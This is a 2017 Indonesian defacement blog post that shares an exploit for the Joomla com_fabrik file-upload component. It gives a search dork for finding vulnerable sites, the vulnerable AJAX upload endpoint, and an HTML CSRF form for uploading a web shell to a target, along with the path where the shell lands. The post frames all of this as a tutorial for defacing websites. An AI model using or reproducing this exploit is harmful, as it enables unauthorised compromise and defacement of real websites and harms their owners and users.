Home Deface Exploit Joomla WebApps Deface Joomla Com_fabrik Upload Shell CSRF

Wednesday, December 13, 2017

Deface Joomla Com_fabrik Upload Shell CSRF

Diterbitkan
Tags


Fazlast This time will share exploit deface joomla com_File upload shell with csrf.
for the tutorial please see below
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
[+] $ Exploit Title : Joomla Com_fabrik Upload Shell
[+]
[+] $ Dork : inurl:index.php?option=com_fabrik
[+]
[+] $ Author: KING Zer0
[+]
[+] $ Tested : win - Linux
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]
-----------------------------------------------------------|
|[+] Exploit :
|[+]
|[+]  /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
|[+]
|[+]  Vuln = {"filepath":null,"uri":null}
|[+]
|[+] Csrf = <form method="POST" action="http://target.com/index.php?
|[+]          option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
|[+]          enctype="multipart/form-data">
|[+]    <input type="file" name="file" /><button>Upload</button>
|[+]     </form>
|[+]
|[+]
|[+]
|[+]
|[+]
|[+] $ Your Access Shell: /patch/file.php
|[+]
-----------------------------------------------------------|
# Thanks to : Mr.Aljabar - RootNatsuhaa - 66H057in53CUR17Y - Xai Syndicate - PhantomGhost - All Defacer Indonesia

Artikel Terkait

Unknown

Next Post
Previous Post

1 comments so far

avatar
Balas
akbarlucu delete December 14, 2017 at 12:23 AM

Mantep stah, kunjungi juga www.otamegakun.com kalo berkenan :)


EmoticonEmoticon

Subscribe to: Post Comments (Atom)